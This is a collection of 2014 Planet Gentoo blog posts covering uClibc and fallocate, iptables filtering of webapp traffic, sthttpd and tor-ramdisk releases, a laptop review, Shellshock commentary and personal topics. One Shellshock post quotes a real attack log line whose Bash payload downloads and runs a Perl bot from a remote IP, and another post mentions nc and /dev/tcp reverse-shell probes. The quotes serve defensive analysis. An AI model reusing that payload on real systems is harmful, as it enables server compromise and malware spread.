It has been four months since my last major build and release of Lilblue Linux, a pet project of mine [1].  The name is a bit pretentious, I admit, since Lilblue is not some other Linux distro.  It is Gentoo, but Gentoo with a twist.  It’s a fully featured amd64, hardened, XFCE4 desktop that uses uClibc instead of glibc as its standard C library.  I use it on some of my workstations at the College and at home, like any other desktop, and I know other people that use it too, but the main reason for its existence is that I wanted to push uClibc to its limits and see where things break.  Back in 2011, I got bored of working with the usual set of embedded packages.  So, while my students were writing their exams in Modern OS, I entertained myself just adding more and more packages to a stage3-amd64-hardened system [2] until I had a decent desktop.  After playing with it on and off, I finally polished it to the point where I thought others might enjoy it too and started pushing out releases.  Recently, I found out that the folks behind uselessd [3] used Lilblue as their testing ground. uselessd is another response to systemd [4], something like eudev [5], which I maintain, so the irony here is too much not to mention!  But that’s another story …

There was only one interesting issue about this release.  Generally I try to keep all releases about the same.  I’m not constantly updating the list of packages in @world.  I did remove pulseaudio this time around because it never did work right and I don’t use it.  I’ll fix it in the future, but not yet!  Instead, I concentrated on a much more interesting problem with a new release of e2fsprogs [6].   The problem started when upstream’s commit 58229aaf removed a broken fallback syscall for fallocate64() on systems where the latter is unavailable [7].  There was nothing wrong with this commit, in fact, it was the correct thing to do.  e4defrag.c used to have the following code:

#ifndef HAVE_FALLOCATE64
#warning Using locally defined fallocate syscall interface.

#ifndef __NR_fallocate
#error Your kernel headers dont define __NR_fallocate
#endif

/*
 * fallocate64() - Manipulate file space.
 *
 * @fd: defrag target file's descriptor.
 * @mode: process flag.
 * @offset: file offset.
 * @len: file size.
 */
static int fallocate64(int fd, int mode, loff_t offset, loff_t len)
{
    return syscall(__NR_fallocate, fd, mode, offset, len);
}
#endif /* ! HAVE_FALLOCATE */

The idea was that, if a configure test for fallocate64() failed because it isn’t available in your libc, but there is a system call for it in the kernel, then e4defrag would just make the syscall via your libc’s indirect syscall() function.  Seems simple enough, except that how system calls are dispatched is architecture and ABI dependent and the above is broken on 32-bit systems [8].  Of course, uClibc didn’t have fallocate() so e4defrag failed to build after that commit.  To my surprise, musl does have fallocate() so this wasn’t a problem there, even though it is a Linux specific function and not in any standard.

My first approach was to patch e2fsprogs to use posix_fallocate() which is supposed to be equivalent to fallocate() when invoked with mode = 0.  e4defrag calls fallocate() in mode = 0, so this seemed like a simple fix.  However, this was not acceptable to Ts’o since he was worried that some libc might implement posix_fallocate() by brute-force writing zeros.  That could be horribly slow for large allocations!  This wasn’t the case for uClibc’s implementation but that didn’t seem to make much difference upstream.  Meh.

Rather than fight e2fsprogs, I sat down and hacked fallocate() into uClibc.  Since both fallocate() and posix_fallocate(), and their LFS counterparts fallocate64() and posix_fallocate64(), make the same syscall, it was sufficient to isolate that in an internal function which both could make use of.  That, plus a test suite, and Bernhard was kind enough to commit it to master [10].  Then a couple of backports, and uClibc’s 0.9.33 branch now has the fix as well.  Because there hasn’t been a release of uClibc in about two years, I’m using the 0.9.33 branch HEAD for Lilblue, so the problem there was solved — I know it’s a little problematic, but it was either that or try to juggle dozens of patches.

The only thing that remains is to backport those fixes to vapier’s patchset that he maintains for the uClibc ebuilds.  Since my uClibc stage3s don’t use the 0.9.33 branch head, but the stable tree ebuilds which use the vanilla 0.9.33.2 release plus Mike’s patchset, upgrading e2fsprogs is blocked for those stages.

This whole process may seem like a real pita, but this is exactly the sort of issues I like uncovering and cleaning up.  So far, the feedback on the latest release is good.  If you want to play with Lilblue and you don’t have a free box, fire up VirtualBox or your emulator of choice and give it a try.  You can download it from the experimental/amd64/uclibc off any mirror [11].

October 03, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
Does your webapp really need network access? (October 03, 2014, 23:01 UTC)

One of the interesting things that I noticed after shellshock was the amount of probes for vulnerabilities that counted on webapp users having direct network access. Not only pings to known addresses just to verify the vulnerability, or wget or curl with unique IDs, but even very rough nc or even /dev/tcp connections to give remote shells. The fact that the probes are there makes it logical to me to expect that for at least some of the systems these actually worked.

The reason why this piqued my interest is that I realized most people don't take the one obvious step to mitigate this kind of problem: removing (or at least limiting) their web apps' access to the network. So I decided it might be worth describing for a moment why you should think about that. This is in part because I found out last year at LISA that not all sysadmins have enough training in development to immediately pick up how things work, and in part because I know that even if you're a programmer it might be counterintuitive for you to think that web apps should not have access, well, to the web.

Indeed, if you think of your app in the abstract, it has to have access to the network to serve the response to the users, right? But what happens generally is that you have some division between the web server and the app itself. People who have looked into Java in the early noughties probably have heard of the term Application Server, which usually is present in the form of Apache Tomcat or IBM WebSphere, but essentially the same "actor" exists for Rails apps in the form of Passenger, or for PHP with the php-fpm service. These "servers" are effectively self-contained environments for your app, that talk with the web server to receive user requests and serve them responses. This essentially means that in the basic web interaction, there is no network access needed for the application service.

Things get a bit more complicated in the Web 2.0 era though: OAuth2 requires your web app to talk, from the backend, with the authentication or data providers. Similarly even my blog needs to talk with some services, either to ping them to tell them that a new post is out, or to check with Akismet for blog comments that might or might not be spam. WordPress plugins that create thumbnails are known to exist and to have a bad security history, and they fetch external content, such as videos from YouTube and Vimeo, or images from Flickr and other hosting websites to process. So there is a good amount of network connectivity needed for web apps too. Which means that rather than just isolating apps from the network, what you need to implement is some sort of filter.

Now, there are plenty of ways to remove access to the network from your webapp: SElinux, GrSec RBAC, AppArmor, … but if you don't want to set up a complex security system, you can do the trick even with the bare minimum of the Linux kernel, iptables and CONFIG_NETFILTER_XT_MATCH_OWNER. Essentially what this allows you to do is to match (and thus filter) connections based of the originating (or destination) user. This of course only works if you can isolate your webapps on a separate user, which is definitely what you should do, but not necessarily what people are doing. Especially with things like mod_perl or mod_php, separating webapps in users is difficult – they run in-process with the webserver, and negate the split with the application server – but at least php-fpm and Passenger allow for that quite easily. Running as separate users, by the way, has many more advantages than just network filtering, so start doing that now, no matter what.

Now depending on what webapp you have in front of you, you have different ways to achieve a near-perfect setup. In my case I have a few different applications running across my servers. My blog, a WordPress blog of a customer, phpMyAdmin for that database, and finally a webapp for an old customer which is essentially an ERP. These have different requirements so I'll start from the one that has the lowest.

The ERP app was designed to be as simple as possible: it's a basic Rails app that uses PostgreSQL to store data. The authentication is done by Apache via HTTP Basic Auth over HTTPS (no plaintext), so there is no OAuth2 or other backend interaction. The only expected connection is to the PostgreSQL server. Pretty similar are the requirements for phpMyAdmin: it only has to interface with Apache and with the MySQL service it administers, and the authentication is also done on the HTTP side (also encrypted). For both these apps, your network policy is quite obvious: deny any outside connectivity. This becomes a matter of iptables -A OUTPUT -o eth0 -m owner --uid-owner phpmyadmin -j REJECT — and the same for the other user.

The situation for the other two apps is a bit more complex: my blog wants to at least announce that there are new blog posts, and it needs to reach Akismet; both actions use HTTP and HTTPS. WordPress is a bit more complex because I don't have much control over it (it has a dedicated server, so I don't have to care), but I assume it mostly is also HTTP and HTTPS. The obvious idea would be to allow ports 80, 443 and 53 (for resolution). But you can do something better. You can put a proxy on your localhost, and force the webapp to go through it, either as a transparent proxy or by using the environment variable http_proxy to convince the webapp to never connect directly to the web. Unfortunately that is not straightforward to implement as neither Passenger nor php-fpm has a clean way to pass environment variables per user.
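
As a sketch of what such a policy could look like with the owner match; the user name, the proxy port and the choice of a local Squid are assumptions for the example, not a description of my actual setup:

# the blog runs as its own user "typo"; allow it to reach loopback
# (the proxy on 127.0.0.1:3128, e.g. a local Squid, plus any local
# database) and reject everything else it tries to send out
iptables -A OUTPUT -o lo -m owner --uid-owner typo -j ACCEPT
iptables -A OUTPUT -m owner --uid-owner typo -j REJECT

# the webapp then only needs http_proxy=http://127.0.0.1:3128/ set
# in its environment to keep talking to the outside world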

What I've done for now is to hack the environment.rb file to set ENV['http_proxy'] = 'http://127.0.0.1:3128/' so that Ruby will at least respect it. I'm still looking for a solution for PHP unfortunately. In the case of Typo, this actually showed me two things I did not know: when looking at the admin dashboard, it'll make two main HTTP calls: one to Google Blog Search – which was shut down back in May – and one to Typo's version file — which is now a 404 page since the move to the Publify name. I'll soon be shutting down both implementations since I really don't need them. Indeed the Publify development still seems to go toward "let's add all possible new features that other blogging sites have" without considering the actual scalability of the platform. I don't expect to go back to it any time soon.

Anthony Basile a.k.a. blueness (homepage, bugs)

Two years ago, I took on the maintenance of thttpd, a web server written by Jef Poskanzer at ACME Labs [1].  The code hadn’t been updated in about 10 years and there were dozens of accumulated patches in the Gentoo tree, many of which addressed serious security issues.  I emailed upstream and was told the project was “done”, whatever that meant, so I was going to tree-clean it.  When I expressed my intentions on the upstream mailing list I got a bunch of “please don’t!” from users.  So rather than maintain a ton of patches, I forked the code, rewrote the build system to use autotools, and applied all the patches.  I dubbed the fork sthttpd.  There was no particular meaning to the “s”.  Maybe “still kicking”?

I put a git repo up on my server [2], got a mailing list going [3], and set up bugzilla [4].  There hasn’t been much activity, but there was enough that it got noticed by someone who pushed it out to OpenBSD ports [5].

Today, I finally pushed out 2.27.0 after two years.  This release takes care of a couple of new security issues: I fixed the world-readable log problem, CVE-2013-0348 [6], and Vitezslav Cizek <vcizek@suse.com> from OpenSUSE fixed a possible DoS triggered by a specially crafted .htpasswd.  Bob Tennent added some code to correct headers for .svgz content, and Jean-Philippe Ouellet did some code cleanup.  So it was time.

Web servers are not my style, but its tiny size and speed make it perfect for embedded systems, which are near and dear to my heart.  I also make sure it compiles on *BSD and on Linux with glibc, uClibc or musl.  Not bad for a codebase which is over 10 years old!  Kudos to Jef.

Hanno Böck a.k.a. hanno (homepage, bugs)
New laptop Lenovo Thinkpad X1 Carbon 20A7 (October 03, 2014, 21:05 UTC)

Thinkpad X1 Carbon
While I got along well with my Thinkpad T61 laptop, for quite some time I had the plan to get a new one soon. It wasn't an easy decision and I looked in detail at the models available in recent months. I finally decided to buy one of Lenovo's Thinkpad X1 Carbon laptops in its 2014 edition. The X1 Carbon was introduced in 2012, however a completely new variant which is very different from the first one was released in early 2014. To distinguish it from other models it is the 20A7 model.

Judging from the first days of use I think I made the right decision. I hadn't seen the device before I bought it because it seems shops rarely keep this device in stock. I assume this is due to the relatively high price.

I was a bit worried because Lenovo made some unusual decisions for the keyboard, however having used it for a few days I don't feel that it has any severe downsides. The most unusual thing about it is that it doesn't have normal F1-F12 keys; instead it has what Lenovo calls an adaptive keyboard: a touch-sensitive line which can display different kinds of keys. The idea is that different applications can have their own set of special keys there. However, just letting them display the normal F-keys works well and not having "real" keys there doesn't feel like a big disadvantage. Besides that, Lenovo removed the Caps lock and placed Pos1/End there, which is a bit unusual but also nothing I worried about. I also hadn't seen any pictures of the German keyboard before I bought the device. The ^/°-key is not where it used to be (small downside), but the </>/| key is where it belongs (big plus, many laptop vendors get that wrong).

Good things:
* Lightweight, Ultrabook, no unnecessary stuff like CD/DVD drive
* High resolution (2560x1440)
* Hardware is up-to-date (Haswell chipset)

Downsides:
* Due to ultrabook / integrated design, no easy changing of battery, RAM or HD
* No SD card reader
* Have some trouble getting used to the touchpad (however there are lots of possibilities to configure it, I assume by playing with it that'll get better)

It used to be the case that people wrote docs on how to get all the hardware in a laptop running on Linux, which I did for my previous laptops. These days this usually boils down to "run a recent Linux distribution with the latest kernel and xorg packages and most things will be fine". However, I thought having a central place where I collect the relevant information would be nice, so I created one again. As usual I'm running Gentoo Linux.
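
If you want to gather that kind of information yourself, a few standard commands give a quick hardware inventory (nothing laptop-specific here, just the usual tools):

lspci -nnk        # PCI devices with vendor/device IDs and the kernel drivers in use
lsusb             # USB-attached devices (webcam, card reader, bluetooth, ...)
dmesg | less      # kernel messages, useful to spot missing firmware or driver complaints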

For people who plan to run Linux without a dual boot it may be worth mentioning that there seem to be troublesome errors in earlier versions of the BIOS and the SSD firmware. You may want to update them before removing Windows. On my device they were already up-to-date.

September 30, 2014
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)
A little positivity goes a long way (September 30, 2014, 02:59 UTC)

Today was an interesting one that I probably won’t forget for a while. Sure, I will likely forget all the details, but the point of the day will remain in my head for a long time to come. Why? Simply put, it made me think about the power of positivity (which is not generally a topic that consumes much of my thought cycles).

I started out the day in the same way that I start out almost every other day—with a run. I had decided that I was going to go for a 15 km run instead of the typical 10 or 12, but that’s really irrelevant. Within the first few minutes, I passed an older woman (probably in her mid-to-late sixties), and I said “good morning.” She responded with “what a beautiful smile! You make sure to give that gift to everyone today.” I was really taken aback by her comment because it was rather uncommon in this day and age.

Her comment stuck with me for the rest of the run, and I thought about the power that it had. It cost her absolutely nothing to say those refreshing, kind words, and yet, the impact was huge! Not only did it make me feel good, but it had other positive qualities as well. It made me more consciously consider my interactions with so-called “strangers.” I can’t control any aspect of their lives, and I wouldn’t want to do so. However, a simple wave to them, or a “good morning” may make them feel a little more interconnected with humanity.

Not all that long after, I went to get a cup of coffee from a corner shop. The clerk asked if that would be all, and I said it was. He said “Have a good day.” I didn’t have to pay for it because apparently it was National Coffee Day. Interesting. The more interesting part, though, was when I was leaving the store. I held the door for a man, and he said “You, sir, are a gentleman and a scholar,” to which I responded “well, at least one of those.” He said “aren’t you going to tell me which one?” I said “nope, that takes the fun out of it.”

That brief interaction wasn’t anything special at all… or was it? Again, it embodied the interconnectedness of humanity. We didn’t know each other at all, and yet we were able to carry on a short conversation, understand one another’s humour, and, in our own ways, thank each other. He thanked me for a small gesture of politeness, and I thanked him for acknowledging it. All too often those types of gestures go without so much as a “thank you.” All too often, these types of gestures get neglected and never even happen.

What’s my point here? Positivity is infectious and in a great way! Whenever you’re thinking that the things you do and say don’t matter, think again. Just treating the people with whom you come in contact many, many times each day with a little respect can positively change the course of their day. A smile, saying hello, casually asking them how they’re doing, holding a door, helping someone pick up something that they’ve dropped, or any other positive interaction should be pursued (even if it is a little inconvenient for you). Don’t underestimate the power of positivity, and you may just help someone feel better. What’s more important than that? That’s not a rhetorical question; the answer is “nothing.”

Cheers,
Zach

September 28, 2014
Hanno Böck a.k.a. hanno (homepage, bugs)
Responsibility in running Internet infrastructure (September 28, 2014, 23:31 UTC)

If you have any interest in IT security you have probably heard of the vulnerability in the command-line shell Bash now called Shellshock. Whenever serious vulnerabilities are found in such a widely used piece of software it's inevitable that this will have some impact. Machines get owned and abused to send spam, DDoS other people or spread malware. However, I feel a lot of the scale of the impact is due to the fact that far too many people run Internet infrastructure in an irresponsible way.

After Shellshock hit the news it didn't take long for the first malicious attacks to appear in people's webserver logs - besides some scans that were done by researchers. On Saturday I had a look at a few such log entries, from my own servers and from what other people posted on some forums. This was one of them:

0.0.0.0 - - [26/Sep/2014:17:19:07 +0200] "GET /cgi-bin/hello HTTP/1.0" 404 12241 "-" "() { :;}; /bin/bash -c \"cd /var/tmp;wget http://213.5.67.223/jurat;curl -O /var/tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""

Note the time: this was on Friday afternoon, 5 pm (CET timezone). What's happening here is that someone is running an HTTP request where the user agent string, which usually contains the name of the software (e.g. the browser), is set to some malicious code meant to exploit the Bash vulnerability. If successful it would download a malware script called jurat and execute it. We had obviously already upgraded our Bash installation so this didn't do anything on our servers. The file jurat contains a Perl script, a piece of malware called IRCbot.a or Shellbot.B.

For all such logs I checked if the downloads were still available. Most of them were offline, however the one presented here was still there. I checked the IP; it belongs to a Dutch company called AltusHost. Most likely one of their servers got hacked and someone placed the malware there.
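
Checking whether such a download is still being served doesn't require fetching the payload; a HEAD request is enough (using the URL from the log entry above):

curl -sI http://213.5.67.223/jurat | head -n 1    # a "200 OK" status line means the file is still online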

I tried to contact AltusHost in different ways. I tweeted at them. I tried their live support chat. I could chat with somebody who asked me if I was a customer. He told me that if I wanted to report abuse he couldn't help me; I should write an email to their abuse department. I asked him if he couldn't just tell them himself. He said that wasn't possible. I wrote an email to their abuse department. Nothing happened.

At noon on Sunday the malware was still online. When I checked again late on Sunday evening it was gone.

Don't get me wrong: things like this happen. I run servers myself. You cannot protect your infrastructure from every imaginable threat. You can greatly reduce the risk, and we put a lot of effort into doing that, but there are things you can't prevent. Your customers will do things that are out of your control and sometimes security issues arise faster than you can patch them. However, what you can and absolutely must do is have reasonable crisis management.

When one of the servers in your responsibility is part of a large-scale attack based on a threat that's making headlines everywhere, I can't even imagine what it takes not to notice for almost two days. I don't believe I was the only one trying to get their attention. The timescale on which you take action in such a situation is the difference between hundreds and millions of infected hosts. Having your hosts serve malware for that long is the kind of thing that makes the Internet a less secure place for everyone. Companies like AltusHost are helping malware authors. Not directly, but by their inaction.

Sebastian Pipping a.k.a. sping (homepage, bugs)
Unblocking F-keys (e.g. F9 for htop) in Guake 0.5.0 (September 28, 2014, 18:36 UTC)

I noticed that I couldn’t kill a process in htop today: F9 did not seem to be working; actually, most of the F-keys did not.

The reason turned out to be that Guake 0.5.0 takes over keys F1 to F10 for direct access to tabs 1 to 10.
That may work for most terminal applications, but for htop it’s a killer.

So how can I prevent Guake from taking F9 over?
The preferences dialog allows me to assign a different key, but not no key. Really? There is no context menu, and backspace and delete didn’t help. For now I assume it’s not possible.
So I fire up the gconf-editor, menu > Edit > Find… > “guake” — there it is. However, upon “Edit key…” gconf-editor says to me:

Currently pairs and schemas can’t be edited. This will be changed in a later version.

Very nice.

In the end what did work was to run

gconftool-2 --set /schemas/apps/guake/keybindings/local/switch_tab9 \
	--type string ''

and to restart Guake.
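
If you want to free all ten F-keys at once, the same setting can be applied in a loop; this assumes the other bindings follow the same switch_tabN naming as the key above:

for n in $(seq 1 10); do
	gconftool-2 --set /schemas/apps/guake/keybindings/local/switch_tab$n \
		--type string ''
done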

I just opened a bug for this. If you like, you can follow it at https://github.com/Guake/guake/issues/376.

Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
What does #shellshock mean for Gentoo? (September 28, 2014, 10:56 UTC)

Gentoo Penguins with chicks at Jougla Point, Antarctica
Photo credit: Liam Quinn

This is going to be interesting as Planet Gentoo is currently unavailable as I write this. I'll try to send this out further so that people know about it.

By now we have all been doing our best to update our laptops and servers to the new bash version so that we are safe from the big scare of the quarter, shellshock. I say laptop because the way the vulnerability can be exploited limits the impact considerably if you have a desktop or otherwise connect only to trusted networks.

What remains to be done is to figure out how to avoid a repeat of this. And that's a difficult topic, because a 25-year-old bug is not easy to avoid, especially because there are probably plenty of siblings of it around that we have not found yet, just like this last week. But there are things that we can do as a whole environment to reduce the chances of problems like this either happening at all or at least escalating so quickly.

In this post I want to look into some things that Gentoo and its developers can do to make things better.

The first obvious thing is to figure out why /bin/sh for Gentoo is not dash or any other very limited shell such as BusyBox. The main answer lies in the init scripts that still use bashisms; this is not news, as I pushed for that four years ago, while Roy insisted on it even before that. Interestingly enough, though, this excuse is getting less and less relevant thanks to systemd. It is indeed, among all the reasons, one thing I find very good in Lennart's design: we want declarative init systems, not imperative ones. Unfortunately, even systemd is not as declarative as it was originally supposed to be, so the init script problem is only half solved — on the other hand, it does make things much easier, as you have to start afresh anyway.

If all your init scripts are free of bash requirements, or you're using systemd (like me on the laptops), then it's mostly safe to switch to dash as the provider for /bin/sh:

# emerge eselect-sh
# eselect sh set dash

That will change your /bin/sh and make it much less likely that you'd be vulnerable to this particular problem. Unfortunately, as I said, it's only mostly safe. I even found that some of the init scripts I wrote, which I had checked with checkbashisms, did not work as intended with dash; fixes are on their way. I also found that the lsb_release command, while not requiring bash itself, uses non-POSIX features, resulting in garbage in the output — this breaks facter-2 but not facter-1, as I found out when it broke my Puppet setup.
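
If you want to do a similar check on your own system before switching, checkbashisms can be pointed straight at the init scripts; treat it as a first pass, since (as I found out) a clean report doesn't guarantee dash will be happy:

checkbashisms /etc/init.d/* 2>&1 | less    # flags bash-only constructs in scripts meant for /bin/sh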

Interestingly it would be simpler for me to use zsh, as then both the init script and lsb_release would have worked. Unfortunately when I tried doing that, Emacs tramp-mode froze when trying to open files, both with sshx and sudo modes. The same was true for using BusyBox, so I decided to just install dash everywhere and use that.

Unfortunately it does not mean you'll be perfectly safe or that you can remove bash from your system. Especially in Gentoo, we have too many dependencies on it, the first being Portage of course, but eselect also qualifies. Of the two I'm actually more concerned about eselect: I have been saying this from the start, but designing such a major piece of software – that does not change that often – in bash sounds like insanity. I still think that is the case.

I think this is the main problem: in Gentoo especially, bash has always been considered a programming language. That's bad. Not only because it has just one reference implementation, but also because it seems to convince other people, new to coding, that this is good engineering practice. It is not. If you need to build something like eselect, you do it in Python, or Perl, or C, but not bash!

Gentoo is currently stagnating, and that's hard to deny. I've stopped being active since I finally accepted stable employment – I'm almost thirty, it was time to stop playing around, I needed to make a living, even if I don't really make a life – and QA has obviously taken a step back (I still have a non-working dev-python/imaging on my laptop). So trying to push for getting rid of bash in Gentoo altogether is not a good deal. On the other hand, even though it's going to be probably too late to be relevant, I'll push for having a Summer of Code next year to convert eselect to Python or something along those lines.

Myself, I decided that the current bashisms in the init scripts I rely upon on my servers are simple enough that dash will work, so I pushed that through Puppet to all my servers. It should be enough, for the moment. I expect more scrutiny to be spent on dash, zsh, ksh and the other shells in the next few months as people migrate around, or decide that a 25-year-old bug is enough to think twice about all of them, so I'll keep my options open.

This is actually why I like software biodiversity: it allows you to select different options when one component fails, and that is what worries me the most with systemd right now. I also hope that showing how bad bash has been all this time with its closed development will make it possible to have a better syntax-compatible shell with a proper parser, even better with a properly librarised implementation. But that's probably hoping too much.

September 27, 2014
Anthony Basile a.k.a. blueness (homepage, bugs)
Tor-ramdisk 20140925 released (September 27, 2014, 16:35 UTC)

I’ve been blogging about my non-Gentoo work using my drupal site at http://opensource.dyc.edu/ but since I may be losing that server sometime in the future, I’m going to start duplicating those posts here.  This work should be of interest to readers of Planet Gentoo because it draws a lot from Gentoo, but it doesn’t exactly fall under the category of a “Gentoo Project.”

Anyhow, today I’m releasing tor-ramdisk 20140925.  As you may recall from a previous post, tor-ramdisk is a uClibc-based micro Linux distribution I maintain whose only purpose is to host a Tor server in an environment that maximizes security and privacy.  Security is enhanced using Gentoo’s hardened toolchain and kernel, while privacy is enhanced by forcing logging to be off at all levels.  Also, tor-ramdisk runs in RAM, so no information survives a reboot, except for the configuration file and the private RSA key, which may be exported/imported by FTP or SCP.

A few days ago, the Tor team released 0.2.4.24 with one major bug fix according to their ChangeLog. Clients were apparently sending the wrong address for their chosen rendezvous points for hidden services, which sounds like it shouldn’t work, but it did because they also sent the identity digest. This fix should improve surfing of hidden services. The other minor changes involved updating geoip information and the address of a v3 directory authority, gabelmoo.

I took this opportunity to also update busybox to version 1.22.1, openssl to 1.0.1i, and the kernel to 3.16.3 + Gentoo’s hardened-patches-3.16.3-1.extras. Both the x86 and x86_64 images were tested using node “simba” and showed no issues.

You can get tor-ramdisk from the following URLs (at least for now!):

i686:
Homepage: http://opensource.dyc.edu/tor-ramdisk
Download: http://opensource.dyc.edu/tor-ramdisk-downloads

x86_64:
Homepage: http://opensource.dyc.edu/tor-x86_64-ramdisk
Download: http://opensource.dyc.edu/tor-x86_64-ramdisk-downloads

 

September 26, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)

Living on Credit Cards
Photo credit: Images_of_Money

Almost exactly 18 months after moving to Ireland I'm finally bound to receive my first Irish credit card. This took longer than I was expecting, but at least it should cover a few of the needs I have, although it's not exactly my perfect plan either. But I guess it's better to start from the top.

First of all, I already have credit cards, Italian ones that, as I wrote before, are not chip'n'pin, which causes a major headache in countries such as Ireland (but the UK too), where non-chip'n'pin-capable cards are not really well supported or understood. This means that they are not viable, even though I have been using them for years and I have enough credit history with them that they have a higher limit than the norm, which is especially handy when dealing with things like expensive hotels if I'm on vacation.

But the question becomes: why do I need a credit card? The answer lies in the mess that the Irish banking system is: since there is no "good" bank over here, I've been using the same bank I was signed up with when I arrived, AIB. Unfortunately their default account, which is advertised as "free", is only really free if for the whole quarter your bank account never goes below €2.5k. This is not the "usual" style I've seen from American banks, where they expect that your average does not go below a certain amount and it does not matter if one day you have no money and the next you have €10k on it: here, if for one day in the quarter you dip below the threshold, you have to pay for the account, and dearly. At that point every single operation becomes a €.20 charge. Including PayPal's debit/credit verification, AdSense EFT account verification, Amazon KDP monthly credits. And including every single use of your debit card — for a while, NFC payments were excluded, so I tried to use them more, but very few merchants allowed that, and the €15 limit on their use made it quite impractical to pay for most things. In the past year and a half, I paid an average of €50/quarter for a so-called free account.

Operations on most credit cards are, on the other hand, free; there are sometimes charges for "overseas usage" (foreign transactions), and you are charged interest if you don't pay the full amount of the debt at the end of the month, but you don't pay a fixed charge per operation. What you do pay here in Ireland is stamp duty, which is €30/year. A whole lot more than Italy, where it was €1.81 until they dropped it. So my requirements for a credit card are essentially to hide these costs as much as possible. Which essentially means that just getting a standard AIB card is not going to be very useful: yes, I would be saving money after the first 150 operations (€30 of stamp duty at €.20 per operation), but I would save even more by keeping those €2.5k in the bank.

My planned end games were two: a Tesco credit card and an American Express Platinum, for very different reasons. I was finally able to get the former, but the latter is definitely out of my reach, as I'll explain later.

The Tesco credit card is a very simple option: you get 0.5% "pointback", as you get 1 Clubcard point for every €2 spent. Since for each point you get a €.01 discount at the end of the quarter, it's almost like cashback, as long as you buy your groceries from Tesco (which I do, because it's handy to have the delivery rather than having to go out for that, especially for things that are frozen or that weigh a bit). Given that it starts with (I'm told) a puny limit of €750, maxing it out every month is enough to get back the stamp duty price with just the cashback, but it becomes even easier by using it for all the small operations such as dinner, Tesco orders, online charges, mobile phone, …

Getting the Tesco credit card has not been straightforward either. I tried applying a few months after arriving in Ireland, and I was rejected, as I did not have any credit history at all. I tried again earlier this year, adding a raise at work, and the results have been positive. Unfortunately that's only step one: the following steps require you to provide them with three pieces of documentation: something that ensures you're in control of the bank account, a proof of address, and a proof of identity.

The first is kinda obvious: a recent enough bank statement is good, and so is the second, a phone or utility bill — the problem starts when you notice that they ask you for an original and not a copy "from the Internet". This does not work easily given that I explicitly made sure all my services are paperless, so neither the bank nor the phone company sends me paper any more — the bank was the hardest to convince; for over a year they kept sending me a paper letter for every single wire I received with the exception of my pay, which included money coming from colleagues when I acted as a payment hub, PayPal transfers for verification purposes and Amazon KDP revenue, one per country! Luckily, they accepted a color printed copy of both.

Getting a proper ID certified was, though, much more complex. The only document I could use was my passport, as I don't have a driving license or any other Irish ID. I made a proper copy of it, in color, and brought it to my doctor for certification; he stamped it, dated it and signed a declaration, but it was not okay. I brought it to An Post – the Irish postal service – and told them that Tesco wanted a specific declaration on it, showing them the letter they sent me; they refused and just stamped it. I then went to the Garda – the Irish police – and repeated Tesco's request; not only did they refuse to comply, but they told me that they are not allowed to do what Tesco was asking me to make them do, and instead they authenticated a declaration of mine that the passport copy was original and made by me.

What worked, at the end, was to go to a bank branch – didn't have to be the branch I'm enrolled with – and have them stamp the passport for me. Tesco didn't care it was a different branch and they didn't know me, it was still my bank and they accepted it. Of course since it took a few months for me to go through all these tries, by the time they accepted my passport, I needed to send them another proof of address, but that was easy. After that I finally got the full contract to sign and I'm now only awaiting the actual plastic card.

But as I said, my aim was also for an American Express Platinum card. This is a more interesting case study: the card is far from free, as it starts with a yearly fee of €550, which is what makes it a bit of a status symbol. On the other hand, it comes with two features: their rewards program, and the perks of Platinum. The perks are not all useful to me: having Hertz Gold is not useful if you don't drive, and I already have comprehensive travel insurance. I also have (almost) platinum status with IHG, so I don't need a card to get the usual free upgrades if available. The good part about them, though, is that you can bless a second Platinum card that gets the same advantages to "friends or family" — in my case, the target would have been my brother-in-law, as he and my sister love to travel and do rent cars.

It also gives you the option of sending four more cards to friends and family, and in particular I wanted to have one sent to my mother, so that she can have a way to pay for things and debit them to me so I can help her out. Of course, as I said, it has a cost, and a hefty one. On the other hand, it allows you one more trick: you can pay for the membership fee through the same rewards program they sign you up for. I don't remember how much you have to spend in a year to pay for it, but I'm sure I could have managed to get most of the fee waived.

Unfortunately what happens is that American Express requires, in Ireland, a "bank guarantee" — which according to colleagues means your bank would be taking on the onus of paying the first €15k of debt I might incur and not be able to repay. Something like this is not going to fly in Ireland, not only because of the problem with loans after the crisis but also because none of the banks will give you that guarantee today. Essentially American Express is making it impossible for any Irish resident to get a card from them, and this, again according to colleagues, extends to cardholders from other countries moving into Ireland.

The end result is that I'm now stuck with having only one (Visa) credit card in Ireland, which has a feeble, laughable rewards program, but at least I have it, and it should be able to repay itself. I'm still looking for a MasterCard I can get to hedge my bets on card acceptance – it turns out that Visa is not well received in the Netherlands and in Germany – and that can repay itself for the stamp duty.

Tech media has been all the rage this year, trying to hype everything out there as either the end of the Internet of Things or the nail in the coffin of open source. A bunch of opinion pieces I found also tried to imply that open source software is to blame, forgetting that the only reason the security issues found have been considered so nasty is that we know the affected software is widely used.

First there was Heartbleed, with its discoverers deciding to spend time setting up a cool name, logo and website for it, rather than ensuring it would be patched before it became widely known. Months later, LastPass still tells me that some of the websites I have passwords on have not changed their certificates. This spawned some interest around OpenSSL at least, including the OpenBSD fork, which I'm still not sure is going to stick around or not.

Just a few weeks ago a dump of passwords caused a major stir, as some online news sources kept insisting that Google had been hacked. Similarly, people have been insisting for the longest time that it was only Apple's fault that the photos of a bunch of celebrities were stolen and published on a bunch of sites — and they will probably never be expunged from the Internet's collective conscience.

And then there is the whole hysteria about shellshock, which I already dug into. What I promised in that post is a look at the problem from the angle of project health.

With the term project health I'm referring to a whole set of issues around an open source software project. It's something that becomes second nature for a distribution packager/developer, but is not obvious to many, especially because it is not easy to quantify. It's not a function of the number of commits or committers, the number of mailing lists or the traffic in them. It's an aura.

That OpenSSL's project health was terrible was no mystery to anybody. The code base in particular was terribly complicated and catered for corner cases that stopped being relevant years ago, and the LibreSSL developers have found plenty of reasons to be worried. But the fact that the codebase was in such a state, and that the developers didn't care to follow what the distributors do, or review patches properly, was not a surprise. You just need to be reminded of the Debian SSL debacle, which dates back to 2008.

In the case of bash, the situation is a bit more complex. The shell is a base component of all GNU systems, and is FSF's choice of UNIX shell. The fact that the man page clearly states "It's too big and too slow." should tip people off, but it doesn't. And it's not just a matter of extending the POSIX shell syntax with enough sugar that people take it for a programming language and start using it as one — though that is also a big part of what caused this particular issue.

